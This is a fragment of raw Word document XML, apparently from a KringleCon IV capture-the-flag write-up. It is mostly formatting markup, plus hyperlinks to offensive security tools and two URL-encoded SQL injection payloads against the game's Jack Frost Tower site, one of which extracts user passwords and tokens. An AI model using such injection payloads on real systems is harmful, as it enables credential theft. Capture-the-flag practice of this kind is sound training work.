                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="719981687">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1238174572">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="10396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0850">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="342976038">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="405541561">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="529993270">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1206716250">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1241132808">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1335305821">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1396709476">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1483036635">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1617298608">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="203040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printer.kringlecastle.com" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/elfnp3/dvws-node.git" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/NotSoSecure/password_cracking_rules"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nidus-setup:8000" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/snoopysecurity/dvws-node" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://electronics.stackexchange.com/questions/205749/generation-of-square-wave-using-veilo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hyperlink" Target="https://github.com/SecureAuthCorp/impacket" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sqlmapproject/sqlm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www.youtube.com/watch?v=iMh8FTzepU4" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://numato.com/kb/generating-square-wave-using-fpga/"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fox-it/BloodHound.py" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.benjojo.co.uk/post/evil-bit-RFC3514-real-world-usage"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iagox86/hash_extender" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://staging.jackfrosttower.com/detail/666%20UNION%20ALL%20select%20*%20from%20(select%20note%20from%20todo)a%20join%20(select%20id%20from%20todo)b%20join%20(select%20note%20from%20todo%20where%20id%3D2)c%20join%20(select%20password%20from%20users)d%20join%20(select%20token%20from%20users)e%20join%20(select%20date_created%20from%20users)f%20join%20(select%20date_created%20from%20users)g%20LIMIT%2010--,602"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svg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/digininja/CeWL" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/elfnp3/partnerapi.git" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://staging.jackfrosttower.com/detail/600,666%20UNION%20ALL%20SELECT%20*%20FROM%20uniquecontact--,602"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F2AAA8A5494F2B9AF997B5C80E5662"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{15643D56-3856-4B2A-863C-D48568CCCC73}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00276B82" w:rsidRDefault="00BD26E4" w:rsidP="00BD26E4">
          <w:pPr>
            <w:pStyle w:val="C0F2AAA8A5494F2B9AF997B5C80E5662"/>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consolata">
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A00000FF" w:usb1="0000F9EB" w:usb2="0000002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E4"/>
    <w:rsid w:val="001002EF"/>
    <w:rsid w:val="00264452"/>
    <w:rsid w:val="00276B82"/>
    <w:rsid w:val="00BD26E4"/>
    <w:rsid w:val="00FF7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F2AAA8A5494F2B9AF997B5C80E5662">
    <w:name w:val="C0F2AAA8A5494F2B9AF997B5C80E5662"/>
    <w:rsid w:val="00BD2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Prepared by Blake Bourgeois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41</Pages>
  <Words>11541</Words>
  <Characters>74440</Characters>
  <DocSecurity>0</DocSecurity>
  <Lines>1583</Lines>
  <Paragraphs>1035</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>Title</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="1" baseType="lpstr">
      <vt:lpstr>KRINGLECON Iv</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>84946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dcterms:created xsi:type="dcterms:W3CDTF">2021-12-25T13:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-25T23:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>